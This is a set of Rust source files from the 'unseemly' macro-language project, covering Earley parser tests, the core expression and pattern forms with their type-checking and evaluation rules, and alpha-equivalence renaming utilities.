"lhs", (lit_aat "a")), (named "rhs", (lit_aat "b"))]), ); let toks_a_b = tokens_s!("a" "b"); assert_eq!( crate::earley::parse_in_syn_env( &form_pat!((call "Expr")), syn_env!( "other_1" => (scope simple_form("o", form_pat!((lit_aat "other")))), "Expr" => (scope pair_form.clone()), "other_2" => (scope simple_form("o", form_pat!((lit_aat "otherother")))) ), &toks_a_b ) .unwrap(), ast!({pair_form ; ["rhs" => "b", "lhs" => "a"]}) ); } // TODO: We pretty much have to use Rc<> to store grammars in Earley // (that's fine; they're Rc<> already!). // But then, we pretty much have to store Earley rules in Rc<> also (ick!)... // ...and how do we test for equality on grammars and rules? 
// I think we pretty much need to force memoization on the syntax extension functions... #[test] fn extensible_parsing() { use crate::{ ast::AstContents::IncompleteNode, earley::{parse_in_syn_env, ParseContext}, }; fn static_synex(pc: ParseContext, _: Ast) -> ParseContext { ParseContext { grammar: assoc_n!( "a" => Rc::new(form_pat!( (star (named "c", (alt (lit_aat "AA"), [(lit_aat "Back"), (call "o"), (lit_aat "#")]))))), "b" => Rc::new(form_pat!((lit_aat "BB"))) ) .set_assoc(&pc.grammar), ..pc } } assert_eq!( parse_top(&form_pat!((extend_nt [], "b", static_synex)), tokens_s!("BB")), Ok(ast_shape!(() "BB")) ); let orig = assoc_n!( "o" => Rc::new(form_pat!( (star (named "c", (alt (lit_aat "O"), [(lit_aat "Extend"), (extend_nt [], "a", static_synex), (lit_aat "#")])))))); assert_eq!( parse_in_syn_env( &form_pat!((call "o")), orig.clone(), tokens_s!("O" "O" "Extend" "AA" "AA" "Back" "O" "#" "AA" "#" "O") ) .unwrap(), ast!({- "c" => ["O", "O", ("Extend" (() {- "c" => ["AA", "AA", ("Back" {- "c" => ["O"]} "#"), "AA"]}) "#"), "O"]}) ); assert_eq!( parse_in_syn_env( &form_pat!((call "o")), orig.clone(), tokens_s!("O" "O" "Extend" "AA" "AA" "Back" "AA" "#" "AA" "#" "O") ) .is_err(), true ); assert_eq!( parse_in_syn_env( &form_pat!((call "o")), orig.clone(), tokens_s!("O" "O" "Extend" "O" "#" "O") ) .is_err(), true ); fn counter_synex(_: ParseContext, a: Ast) -> ParseContext { let count = match a.c() { IncompleteNode(mbe) => mbe, _ => panic!(), } .get_rep_leaf_or_panic(n("n")) .len(); ParseContext::new_from_grammar( assoc_n!("count" => Rc::new(Literal(Rc::new(new_scan(r"\s*(\S+)", None)), n(&count.to_string())))), ) } assert_m!( parse_top( &form_pat!((extend_nt (star (named "n", (lit_aat "X"))), "count", counter_synex)), tokens_s!("X" "X" "X" "4") ), Err(_) ); assert_eq!( parse_top( &form_pat!((extend_nt (star (named "n", (lit_aat "X"))), "count", counter_synex)), tokens_s!("X" "X" "X" "X" "4") ), Ok(ast_shape!({- "n" => ["X", "X", "X", "X"]} "4")) ); assert_m!( parse_top( 
&form_pat!((extend_nt (star (named "n", (lit_aat "X"))), "count", counter_synex)), tokens_s!("X" "X" "X" "X" "X" "4") ), Err(_) ); } // #[test] // fn test_syn_env_parsing() as{ // let mut se = Assoc::new(); // se = se.set(n("xes"), Box::new(Form { grammar: form_pat!((star (lit_aat "X")), // relative_phase)})) // }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_forms.rs
src/core_forms.rs
// This virtual machine kills cyber-fascists. use crate::{ ast::*, ast_walk::{LazyWalkReses, WalkRule::*}, core_type_forms::*, form::Form, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, runtime::eval::*, ty::*, util::assoc::Assoc, }; use std::rc::Rc; // type forms are kinda bulky // Core forms! // // This is the definition of Unseemly, the bizarre boiled-down programming language. // // Unseemly programs have expressions and types (and probably kinds, too). /// Remove an `ExtendEnv` without respecting its binding behavior. /// This is safe if directly inside a `Node` that was just freshened. /// (TODO: think about what "just" means here. It's super-subtle!) pub fn strip_ee(a: &Ast) -> &Ast { match a.c() { ExtendEnv(body, _) => &*body, ExtendEnvPhaseless(body, _) => &*body, _ => icp!("Not an EE"), } } pub fn strip_ql(a: &Ast) -> &Ast { match a.c() { QuoteLess(body, _) => &*body, _ => icp!("Not an unquote"), } } // lambda ==> [param: Atom p_t: Type]* body: Expr fn type_lambda(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let lambda_type: Ast = ast!({ find_type("fn") ; "param" => [* part_types =>("param") part_types : (, part_types.get_res(n("p_t"))? )], "ret" => (, part_types.get_res(n("body"))? )}); Ok(lambda_type) } fn eval_lambda(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { Ok(Function(Rc::new(Closure { body: strip_ee(part_values.get_term_ref(n("body"))).clone(), params: part_values.get_rep_term(n("param")).iter().map(Ast::to_name).collect(), env: part_values.env, }))) } // apply ==> rator: Expr [rand: Expr]* fn type_apply(part_types: LazyWalkReses<SynthTy>) -> TypeResult { use crate::walk_mode::WalkMode; let return_type = crate::ty_compare::Subtype::underspecified(n("<return_type>")); // The `rator` must be a function that takes the `rand`s as arguments: let _ = crate::ty_compare::is_subtype( &ast!({ "Type" "fn" : "param" => (,seq part_types.get_rep_res(n("rand"))? 
), "ret" => (, return_type.clone() )}), &part_types.get_res(n("rator"))?, &part_types, ) .map_err(|e| crate::util::err::sp(e, part_types.this_ast.clone()))?; // TODO: write a test that exercises this (it's used in the prelude) // What return type made that work? crate::ty_compare::unification.with(|unif| { let res = crate::ty_compare::resolve( crate::ast_walk::Clo { it: return_type, env: part_types.env.clone() }, &unif.borrow(), ); // Canonicalize the type in its environment: let res = crate::ty_compare::canonicalize(&res.it, res.env); res.map_err(|e| crate::util::err::sp(e, part_types.this_ast.clone())) }) } fn eval_apply(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { match part_values.get_res(n("rator"))? { Function(clos) => { let mut new_env = clos.env.clone(); for (p, v) in clos.params.iter().zip(part_values.get_rep_res(n("rand"))?) { new_env = new_env.set(*p, v); } // TODO: this seems wrong; it discards other phase information. // But would it be correct to have closures capture at all phases? crate::runtime::eval::eval(&clos.body, new_env) } BuiltInFunction(crate::runtime::eval::BIF(f)) => Ok(f(part_values.get_rep_res(n("rand"))?)), other => { icp!("[type error] invoked {:#?} as if it were a function", other) } } } // match ==> scrutinee: Expr [p: Pat arm: Expr]* fn type_match(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let mut res: Option<Ast> = None; for arm_part_types in part_types.march_parts(&[n("arm"), n("p")]) { // We don't need to manually typecheck that the arm patterns match the scrutinee; // the import handles that for us. 
let arm_res = arm_part_types.get_res(n("arm"))?; match res { None => res = Some(arm_res), Some(ref old_res) => { ty_exp!(old_res, &arm_res, arm_part_types.get_term(n("arm"))); } } } match res { None => { // TODO #2: this isn't anywhere near exhaustive ty_err!(NonExhaustiveMatch(part_types.get_res(n("scrutinee")).unwrap()) at ast!((trivial)) /* TODO */) } Some(ty_res) => Ok(ty_res), } } fn eval_match(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { for arm_values in part_values.march_all(&[n("arm"), n("p")]) { // TODO: don't we need to set a context? match arm_values.get_res(n("arm")) { Ok(res) => { return Ok(res); } Err(()) => { /* try the next one */ } } } panic!("No arms matched! TODO #2"); } // enum_expr ==> name: Atom [component: Expr]* fn type_enum_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let res: Ast = part_types.get_res(n("t"))?; expect_ty_node!( (res ; find_type("enum") ; &part_types.this_ast) enum_type_parts; { for enum_type_part in enum_type_parts.march_all(&[n("name"), n("component")]) { if &part_types.get_term(n("name")) != enum_type_part.get_leaf_or_panic(&n("name")) { continue; // not the right arm } let component_types : Vec<&Ast> = enum_type_part.get_rep_leaf_or_panic(n("component")); // TODO: check that they're the same length! for (t, expected_t) in part_types.get_rep_res(n("component"))? 
.iter().zip(component_types) { ty_exp!(t, expected_t, part_types.this_ast); } return Ok(res); } ty_err!(NonexistentEnumArm(part_types.get_term(n("name")).to_name(), res) at part_types.this_ast); } ) } fn eval_enum_expr(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { Ok(Enum(part_values.get_term(n("name")).to_name(), part_values.get_rep_res(n("component"))?)) } // struct_expr ==> [component_name: Atom component: Expr]* fn type_struct_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { Ok(ast!({ find_type("struct") ; "component_name" => (@"c" ,seq part_types.get_rep_term(n("component_name"))), "component" => (@"c" ,seq part_types.get_rep_res(n("component"))?) })) } fn eval_struct_expr(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { let mut res = Assoc::new(); for component_parts in part_values.march_parts(&[n("component"), n("component_name")]) { res = res.set( component_parts.get_term(n("component_name")).to_name(), component_parts.get_res(n("component"))?, ); } Ok(Struct(res)) } // tuple_expr ==> [component: Expr]* fn type_tuple_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { Ok(ast!({ find_type("tuple") ; "component" => (,seq part_types.get_rep_res(n("component"))?)})) } fn eval_tuple_expr(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { Ok(crate::runtime::eval::Value::Sequence( part_values.get_rep_res(n("component"))?.into_iter().map(Rc::new).collect(), )) } // unfold ==> body: Expr fn type_unfold(part_types: LazyWalkReses<SynthTy>) -> TypeResult { // TODO: this "evaluates" types twice; once in `get_res` and once in `synth_type` // It shouldn't be necessary, and it's probably quadratic. // Maybe this points to a weakness in the LiteralLike approach to traversing types? let mu_typed = part_types.get_res(n("body"))?; // Pull off the `mu` (and the `ExtendEnv` that it carries): // (This is sound because `mu`'s param must already be in the environment.) 
expect_ty_node!( (mu_typed ; find_type("mu_type") ; &part_types.this_ast) mu_parts; { // This acts like the `mu` was never there (and hiding the binding) if let ExtendEnv(body, _) = mu_parts.get_leaf_or_panic(&n("body")).c() { synth_type(body, part_types.env) } else { icp!("no protection to remove!"); } }) } // fold ==> body: Expr t: Type fn type_fold(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let goal_type = part_types.get_res(n("t"))?; // TODO: I can't figure out how to pull this out into a function // to invoke both here and above, since `mu_type_0` needs cloning... let folded_goal = expect_ty_node!( (goal_type.clone() ; find_type("mu_type") ; &part_types.this_ast) mu_parts; { // This acts like the `mu` was never there (and hiding the binding) if let ExtendEnv(ref body, _) = mu_parts.get_leaf_or_panic(&n("body")).c() { synth_type(body, part_types.env.clone())? } else { icp!("no protection to remove!"); } }); ty_exp!(&part_types.get_res(n("body"))?, &folded_goal, part_types.this_ast); Ok(goal_type) } // forall_expr ==> [param: Atom]* body: Expr fn type__forall_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { Ok(ast!({"Type" "forall_type" : "param" => (,seq part_types.get_rep_term(n("param"))), "body" => (import [* [forall "param"]] (, part_types.get_res(n("body"))?)) })) } // TODO: pull out all the other form implementations into freestanding functions. /// This is the Unseemly language. pub fn make_core_syn_env() -> SynEnv { // HACK: this is around the first thing that happens, so install a panic hook. 
#[cfg(not(target_arch = "wasm32"))] color_backtrace::install(); // Nice backtraces #[cfg(target_arch = "wasm32")] std::panic::set_hook(Box::new(console_error_panic_hook::hook)); // Backtrace to console let ctf: SynEnv = get_core_types(); let cmf: SynEnv = crate::core_macro_forms::make_core_macro_forms(); // Unseemly expressions let main_expr_forms = forms_to_form_pat![ typed_form!("lambda", (delim ".[", "[", [ // TODO: add comma separators to the syntax! (star [(named "param", atom), (lit ":"), (named "p_t", (call "Type"))]), (lit "."), (named "body", (import [* ["param" : "p_t"]], (call "Expr")))]), cust_rc_box!(type_lambda), cust_rc_box!(eval_lambda)), typed_form!("apply", /* function application*/ (delim "(", "(", [(named "rator", (call "Expr")), (star (named "rand", (call "Expr")))]), cust_rc_box!(type_apply), cust_rc_box!(eval_apply)), typed_form!("match", [(lit "match"), (named "scrutinee", (call "Expr")), (delim "{", "{", (plus [(named "p", (call "Pat")), (lit "=>"), (named "arm", (import ["p" = "scrutinee"], (call "Expr")))]))], cust_rc_box!(type_match), cust_rc_box!(eval_match) ), // Note that we inconveniently require the user to specify the type. // "real" languages infer the type from the (required-to-be-unique) // component name. typed_form!("enum_expr", [(delim "+[", "[", [(named "name", atom), (star (named "component", (call "Expr")))]), (lit ":"), (named "t", (call "Type"))], cust_rc_box!(type_enum_expr), cust_rc_box!(eval_enum_expr)), typed_form!("struct_expr", (delim "*[", "[", (star [(named "component_name", atom), (lit ":"), (named "component", (call "Expr"))])), cust_rc_box!(type_struct_expr), cust_rc_box!(eval_struct_expr)), typed_form!("tuple_expr", (delim "**[", "[", (star (named "component", (call "Expr")))), cust_rc_box!(type_tuple_expr), cust_rc_box!(eval_tuple_expr) ), // e.g. // let_type // pair = mu lhs rhs. {l: lhs, r: rhs} // point = pair<int, int> // in ... 
typed_form!("let_type", [(lit "let_type"), (named "type_kind_stx", (anyways "*")), (star [(named "type_name", atom), (lit "="), (named "type_def", (import [* ["type_name" = "type_def"]], (call "Type")))]), (lit "in"), (named "body", (import [* ["type_name" = "type_def"]], (call "Expr")))], Body(n("body")), // HACK: like `Body(n("body"))`, but ignoring the binding, since it's type-level. // This feels like it ought to be better-handled by `beta`, or maybe a kind system. cust_rc_box!( move | let_type_parts | { crate::ast_walk::walk::<Eval>( strip_ee(&let_type_parts.get_term(n("body"))), &let_type_parts) })), // e.g. where List = ∀ X. μ List. enum { Nil(), Cons(X, List<X>) } // .[x : List<X> . match (unfold x) ... ]. // (unfold is needed because `match` wants an `enum`, not a `μ`) // Exposes the inside of a μ type by performing one level of substitution. typed_form!("unfold", [(lit "unfold"), (named "body", (call "Expr"))], cust_rc_box!(type_unfold), Body(n("body"))), // e.g. where List = ∀ X. μ List. enum { Nil (), Cons (X, List<X>) } // (.[x : List<X> . ...]. 
(fold +[Nil]+) ) : List<X> typed_form!("fold", [(lit "fold"), (named "body", (call "Expr")), (lit ":"), (named "t", (call "Type"))], cust_rc_box!(type_fold), Body(n("body"))), typed_form!("forall_expr", [(lit "forall"), (star (named "param", atom)), (lit "."), (named "body", (import [* [forall "param"]], (call "Expr")))], cust_rc_box!(type__forall_expr), Body(n("body"))), crate::core_qq_forms::quote(/* positive= */ true), crate::core_macro_forms::extend_syntax() ]; let main_pat_forms = forms_to_form_pat_export![ negative_typed_form!("enum_pat", (delim "+[", "[", [(named "name", atom), (star (named "component", (call "Pat")))]), /* (Negatively) Typecheck: */ cust_rc_box!( move | part_types | expect_ty_node!( (part_types.context_elt() ; find_type("enum") ; &part_types.this_ast) enum_type_parts; { let arm_name = &part_types.get_term(n("name")); for enum_type_part in enum_type_parts .march_all(&[n("name"), n("component")]) { if arm_name != enum_type_part.get_leaf_or_panic(&n("name")) { continue; // not the right arm } let component_types : Vec<Ast> = enum_type_part.get_rep_leaf_or_panic(n("component")).into_iter().cloned().collect(); let mut res = Assoc::new(); for sub_res in &part_types .get_rep_res_with(n("component"), component_types)? { res = res.set_assoc(sub_res); } return Ok(res); } ty_err!(NonexistentEnumArm(arm_name.to_name(), ast!((trivial))) /* TODO `LazyWalkReses` needs more information */ at arm_name.clone()) } )), /* (Negatively) Evaluate: */ cust_rc_box!( move | part_values | { match *part_values.context_elt() /* : Value */ { Enum(ref name, ref elts) => { // "Try another branch" if name != &part_values.get_term(n("name")).to_name() { return Err(()); } let mut res = Assoc::new(); for sub_res in &part_values.get_rep_res_with(n("component"), elts.clone())? 
{ res = res.set_assoc(sub_res); } Ok(res) } _ => icp!("[type error] non-enum") } })) => [* ["component"]], negative_typed_form!("struct_pat", [(delim "*[", "[", (star [(named "component_name", atom), (lit ":"), (named "component", (call "Pat"))]))], /* (Negatively) typesynth: */ cust_rc_box!( move | part_types | expect_ty_node!( (part_types.context_elt() ; find_type("struct") ; &part_types.this_ast) struct_type_parts; { let mut res = Assoc::new(); for component_ctx in part_types .march_parts(&[n("component"), n("component_name")]) { let mut component_found = false; for struct_type_part in struct_type_parts .march_all(&[n("component"), n("component_name")]) { if &component_ctx.get_term(n("component_name")) != struct_type_part.get_leaf_or_panic(&n("component_name")) { continue; } component_found = true; let component_type = struct_type_part.get_leaf_or_panic(&n("component")).clone(); res = res.set_assoc( &component_ctx.with_context(component_type) .get_res(n("component"))?); break; } if !component_found { ty_err!(NonexistentStructField( component_ctx.get_term(n("component_name")).to_name(), part_types.context_elt().clone()) at part_types.get_rep_term(n("component"))[0].clone()); } } Ok(res) })), cust_rc_box!( move | part_values | { match *part_values.context_elt() { Struct(ref contents) => { let mut res = Assoc::new(); for component_ctx in part_values .march_parts(&[n("component"), n("component_name")]) { res = res.set_assoc( &component_ctx .with_context(contents.find_or_panic( &component_ctx.get_term(n("component_name")).to_name()) .clone()) .get_res(n("component"))?); } Ok(res) } _ => icp!("[type error] non-struct") } })) => [* ["component"]], negative_typed_form!("tuple_pat", (delim "**[", "[", (star (named "component", (call "Pat")))), cust_rc_box!( move |part_types| expect_ty_node!( (part_types.context_elt() ; find_type("tuple") ; &part_types.this_ast) ctxt_type_parts; { let component_types : Vec<Ast> = ctxt_type_parts.get_rep_leaf_or_panic(n("component")) 
.into_iter().cloned().collect(); let mut res = Assoc::new(); for sub_res in &part_types .get_rep_res_with(n("component"), component_types)? { res = res.set_assoc(sub_res); } return Ok(res); } )), cust_rc_box!( move |part_values| { match *part_values.context_elt() { Sequence(ref sub_vals) => { let sub_vals: Vec<Value> = sub_vals.iter() .map(|rcv: &Rc<Value>| (**rcv).clone()).collect(); let mut res = Assoc::new(); for sub_res in &part_values.get_rep_res_with(n("component"), sub_vals)? { res = res.set_assoc(sub_res); } Ok(res) } _ => icp!("[type error] non-tuple") } }) ) => [* ["component"]], // TODO #16: We need a pattern for destructuring tuples. crate::core_qq_forms::quote(/*positive=*/false) => ["body"]]; let reserved_names = vec![ n("forall"), n("mu_type"), n("Ident"), n("Int"), n("Nat"), n("Float"), n("String"), n("match"), n("enum"), n("struct"), n("fold"), n("unfold"), n("extend_syntax"), n("in"), n("import"), n("capture_language"), ]; syn_env!( "Pat" => (biased (,main_pat_forms), (call "DefaultAtom")), "Expr" => (biased (alt (, main_expr_forms), (, crate::core_extra_forms::make_core_extra_forms())), (call "DefaultReference")), "Ident" => (call "DefaultAtom"), "AtomNotInPat" => (call "DefaultAtom"), "DefaultReference" => (varref_call "DefaultAtom"), "DefaultSeparator" => (scan r"(\s*)"), "DefaultAtom" => (common (reserved_by_name_vec (call "DefaultWord"), reserved_names)), "DefaultWord" => (common (pick [(call "DefaultSeparator"), (named "name", (scan_cat r"(\p{Letter}(?:\p{Letter}|\p{Number}|[_?])*)", "variable"))], "name")), // TODO: come up with more normal tokenization rules. // HACK: it's really confusing to weld semicolon and colon onto brackets, so exempt them. 
"OpenDelim" => (common (pick [(call "DefaultSeparator"), (named "tok", (scan_cat r"([^\[\]\(\)\{\}\s;:]*[\[\(\{])", "paren.lparen"))], "tok")), "CloseDelim" => (common (pick [(call "DefaultSeparator"), (named "tok", (scan_cat r"([\]\)\}][^\[\]\(\)\{\}\s;:]*)", "paren.rparen"))], "tok")), "DefaultToken" => (common (pick [(call "DefaultSeparator"), (named "tok", (scan r"([^\[\]\(\)\{\}\s]+)"))], "tok")) ) .set_assoc(&ctf) // throw in types! .set_assoc(&cmf) // throw in the types and macros! } /// Mostly for testing purposes, this looks up forms by name. /// In the "real world", programmers look up forms by syntax, using a parser. pub fn find_form(se: &SynEnv, nt: &str, form_name: &str) -> Rc<Form> { fn find_form_rec(f: &FormPat, form_name: &str) -> Option<Rc<Form>> { match *f { Scope(ref f, _) => { if f.name.is(form_name) { Some(f.clone()) } else { None } } Alt(ref vf) => { for f in vf { let res = find_form_rec(f, form_name); if res.is_some() { return res; } } None } Biased(ref lhs, ref rhs) => { let l_res = find_form_rec(lhs, form_name); if l_res.is_some() { l_res } else { find_form_rec(rhs, form_name) } } _ => None, } } let pat = se.find_or_panic(&n(nt)); find_form_rec(pat, form_name) .unwrap_or_else(|| icp!("{:#?} not found in {:#?}", form_name, pat)) } // Inserts a new form into a grammar in the "sensible" place // (underneath any number of `Biased`s, as a new arm of an `Alt`). // Macros will usually want to do this to extend an existing NT. 
pub fn insert_form_pat(se: &SynEnv, nt: Name, f: &FormPat) -> SynEnv { let nt_form: Rc<FormPat> = se.find_or_panic(&nt).clone(); se.set(nt, Rc::new(add_form_at_the_alt(nt_form, f).unwrap())) } pub fn add_form_at_the_alt(outer: Rc<FormPat>, inner: &FormPat) -> Option<FormPat> { match *outer { Biased(ref l, ref r) => { if let Some(new_l) = add_form_at_the_alt(l.clone(), inner) { return Some(Biased(Rc::new(new_l), r.clone())); } if let Some(new_r) = add_form_at_the_alt(r.clone(), inner) { return Some(Biased(l.clone(), Rc::new(new_r))); } return None; } Alt(ref subs) => { let mut my_subs: Vec<Rc<FormPat>> = subs.clone(); my_subs.push(Rc::new(inner.clone())); return Some(Alt(my_subs)); } _ => None, } } thread_local! { pub static core_forms: SynEnv = make_core_syn_env(); } pub fn outermost_form() -> FormPat { // `(call "Expr")`, except allowing whitespace (etc) at the end of a file: form_pat!((pick [(named "program", (call "Expr")), (call "DefaultSeparator")], "program")) } pub fn outermost__parse_context() -> crate::earley::ParseContext { crate::earley::ParseContext { grammar: get_core_forms(), type_ctxt: crate::ast_walk::LazyWalkReses::new_wrapper( crate::runtime::core_values::core_types(), ), eval_ctxt: crate::ast_walk::LazyWalkReses::new_wrapper( crate::runtime::core_values::core_values(), ), } } pub fn find(nt: &str, name: &str) -> Rc<Form> { core_forms.with(|cf| find_form(cf, nt, name)) } // Deprecated; use `::core_forms::find` instead (keep it qualified!) 
pub fn find_core_form(nt: &str, name: &str) -> Rc<Form> { find(nt, name) } pub fn get_core_forms() -> SynEnv { core_forms.with(|cf| cf.clone()) } #[test] fn form_grammar() { assert_eq!( crate::grammar::parse( &form_pat!((call "Type")), outermost__parse_context(), tokens_s!("[" "Ident" "->" "Ident" "]"), ), Ok(ast!({ find("Type", "fn"); ["ret" => {find("Type", "Ident") ; []}, "param" => [{find("Type", "Ident") ; []}]]})) ); } #[test] fn form_expect_node() { let ast = u!({apply : f [x]}); let _: Result<(), ()> = expect_node!( ( ast ; find_core_form("Expr", "apply")) env; { assert_eq!(env.get_leaf_or_panic(&n("rator")), &ast!((vr "f"))); assert_eq!(env.get_rep_leaf_or_panic(n("rand")), vec![&ast!((vr "x"))]); Ok(()) }); } #[test] fn form_type() { let simple_ty_env = assoc_n!( "x" => uty!({Int :}), "n" => uty!({Nat :})); assert_eq!(synth_type(&ast!( (vr "x") ), simple_ty_env.clone()), Ok(uty!({Int :}))); assert_eq!( synth_type(&u!({lambda : [y {Type Nat :}] x}), simple_ty_env.clone()), Ok(uty!({fn : [{Nat :}] {Int :}})) ); } #[test] fn type_apply_with_subtype() { // Application can perform subtyping let nat_ty = ast!({ "Type" "Nat" : }); let ty_env = assoc_n!( "N" => uty!({Nat :}), "nat_to_nat" => uty!({fn : [{Nat :}] {Nat :}}), "forall_t_t_to_t" => uty!({forall_type : [T] {fn : [T] T}})); assert_eq!(synth_type(&u!({apply : nat_to_nat [N]}), ty_env.clone()), Ok(nat_ty.clone())); assert_eq!(synth_type(&u!({apply : forall_t_t_to_t [N]}), ty_env.clone()), Ok(nat_ty.clone())); } #[test] fn form_eval() { use num::bigint::ToBigInt; let simple_env = assoc_n!("x" => val!(i 18), "w" => val!(i 99), "b" => val!(b false)); assert_eq!(eval(&ast!((vr "x")), simple_env.clone()), Ok(Int(18.to_bigint().unwrap()))); // (λy.w) x assert_eq!( eval(&u!({apply : {lambda : [y {Type Int :}] w} [x]}), simple_env.clone()), Ok(Int(99.to_bigint().unwrap())) ); // (λy.y) x assert_eq!( eval(&u!({apply : {lambda : [y {Type Int :}] y} [x]}), simple_env.clone()), Ok(Int(18.to_bigint().unwrap())) ); } 
#[test] fn alg_type() { let mt_ty_env = Assoc::new(); let simple_ty_env = assoc_n!( "x" => uty!({Type Int :}), "n" => uty!({Type Nat :}), "f" => uty!({Type Float :})); let my_enum = ast!({ "Type" "enum" : "name" => [@"c" "Adams", "Jefferson", "Burr"], "component" => [@"c" [{"Type" "Int":}], [{"Type" "Int":}, {"Type" "Nat":}], [{"Type" "Float" :}, {"Type" "Float" :}]] }); // Typecheck enum pattern assert_eq!( neg_synth_type( &u!({Pat enum_pat : Jefferson [(at abc) ; (at def)]}), mt_ty_env.set(negative_ret_val(), my_enum.clone()) ), Ok(Assoc::new().set(n("abc"), ast!({"Type" "Int":})).set(n("def"), ast!({"Type" "Nat":}))) ); // Typecheck enum expression assert_eq!( synth_type(&u!({enum_expr : Jefferson [x ; n] (, my_enum.clone())}), simple_ty_env.clone()), Ok(my_enum.clone()) ); let my_struct = ast!({ "Type" "struct" : "component_name" => [@"c" "x", "y"], "component" => [@"c" {"Type" "Int":}, {"Type" "Float" :}] }); // Typecheck struct pattern assert_eq!( neg_synth_type( &ast!( { "Pat" "struct_pat" : "component_name" => [@"c" "y", "x"], "component" => [@"c" "yy", "xx"] }), mt_ty_env.set(negative_ret_val(), my_struct.clone()) ), Ok(assoc_n!("yy" => ast!({"Type" "Float" :}), "xx" => ast!({"Type" "Int":}))) ); // Typecheck struct expression // TODO: currently {x: integer, y: float} ≠ {y: float, x: integer} // Implement proper type equality! assert_eq!( synth_type( &ast!( { "Expr" "struct_expr" : "component_name" => [@"c" "x", "y"], "component" => [@"c" (vr "x"), (vr "f")] }), simple_ty_env.clone() ), Ok(my_struct) ); // Typecheck tuple expression assert_eq!( synth_type(&u!({ tuple_expr: [x; f] }), simple_ty_env.clone()), Ok(uty!({tuple : [{Int :}; {Float :}]})) ); // Simple match... 
assert_eq!( synth_type( &u!({Expr match : f [(at my_new_name) my_new_name; (at unreachable) f]}), simple_ty_env.clone() ), Ok(ast!({"Type" "Float" :})) ); assert_m!( synth_type( &u!({Expr match : n [(at my_new_name) my_new_name; (at unreachable) f]}), simple_ty_env.clone() ), ty_err_p!(Mismatch(_, _)) ); assert_m!( synth_type( &u!({Expr match : my_enum [{Pat enum_pat => [* ["component"]] : Hamilton [(at ii)]} ii]}), simple_ty_env.set(n("my_enum"), my_enum.clone()) ), ty_err_p!(NonexistentEnumArm(_, _)) // Never gonna be president... ); assert_eq!( synth_type( &u!({Expr match : my_enum [{Pat enum_pat => [* ["component"]] : Adams [(at ii)]} ii; {Pat enum_pat => [* ["component"]] : Jefferson [(at ii) ; (at bb)]} ii; {Pat enum_pat => [* ["component"]] : Burr [(at xx) ; (at yy)]} x]}), simple_ty_env.set(n("my_enum"), my_enum.clone()) ), Ok(ast!({"Type" "Int":})) ); assert_eq!( synth_type(
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/alpha.rs
src/alpha.rs
// Alpha-equivalence utilities. // Based on https://repository.library.northeastern.edu/files/neu:cj82mb52h // `freshen` gets a value ready for destructuring. // `freshen_rec` gets a value and its pattern ready for destructuring. use crate::{ ast::{Ast, AstContents::*}, name::*, util::{assoc::Assoc, mbe::EnvMBE}, }; // A renaming that only affects names at the "current" quotation level #[derive(Clone, Debug, PartialEq)] pub struct Ren { env: Assoc<Name, Ast>, env_phaseless: Assoc<Name, Ast>, q_lev: i16, } impl Ren { pub fn find(&self, n: Name) -> Option<&Ast> { if self.q_lev == 0 { self.env.find(&n).or_else(|| self.env_phaseless.find(&n)) } else { self.env_phaseless.find(&n) } } pub fn unset(self, n: Name) -> Ren { if self.q_lev == 0 { Ren { env: self.env.unset(&n), env_phaseless: self.env_phaseless.unset(&n), q_lev: self.q_lev, } } else { self } } pub fn set_assoc(self, other: &Ren) -> Ren { if self.q_lev == other.q_lev { Ren { env: self.env.set_assoc(&other.env), env_phaseless: self.env_phaseless.set_assoc(&other.env_phaseless), q_lev: self.q_lev, } } else { self } } pub fn q_more(&self, by: u8) -> Ren { Ren { q_lev: self.q_lev + i16::from(by), ..self.clone() } } pub fn q_less(&self, by: u8) -> Ren { Ren { q_lev: self.q_lev - i16::from(by), ..self.clone() } } pub fn new() -> Ren { Ren { env: Assoc::new(), env_phaseless: Assoc::new(), q_lev: 0 } } pub fn single(n: Name, a: Ast) -> Ren { Ren { env: Assoc::new().set(n, a), ..Ren::new() } } pub fn become_phaseless(self) -> Ren { // TODO: which order is right? What could even cause shadowing between these things? Ren { env_phaseless: self.env_phaseless.set_assoc(&self.env), env: Assoc::new(), q_lev: self.q_lev, } } /// For debugging: find a freshening based on `orig_sp` (the never-fresehened spelling). 
pub fn find_orig(&self, orig: &str) -> Option<(Name, Ast)> { for (k, v) in self.env.iter_pairs() { if k.orig_sp() == orig { return Some((*k, v.clone())); } } for (k, v) in self.env_phaseless.iter_pairs() { if k.orig_sp() == orig { return Some((*k, v.clone())); } } None } } impl From<Assoc<Name, Ast>> for Ren { fn from(a: Assoc<Name, Ast>) -> Ren { Ren { env: a, ..Ren::new() } } } fn substitute_rec(node: &Ast, cur_node_contents: &EnvMBE<Ast>, env: &Ren) -> Ast { match node.c() { Node(ref f, ref new_parts, ref export) => { // let new_cnc = parts.clone(); node.with_c(Node( f.clone(), new_parts.marched_map(&mut |_, marched_parts: &EnvMBE<Ast>, part: &Ast| { substitute_rec(part, marched_parts, env) }), export.clone(), )) } VariableReference(n) => env.find(*n).unwrap_or(&node.clone()).clone(), ExtendEnv(ref body, ref beta) => { let mut new_env = env.clone(); for bound_name in crate::beta::bound_from_beta(beta, cur_node_contents, 0) { new_env = new_env.unset(bound_name); } node.with_c(ExtendEnv(substitute_rec(body, cur_node_contents, &new_env), beta.clone())) } ExtendEnvPhaseless(ref body, ref beta) => { let mut new_env = env.clone(); for bound_name in crate::beta::bound_from_beta(beta, 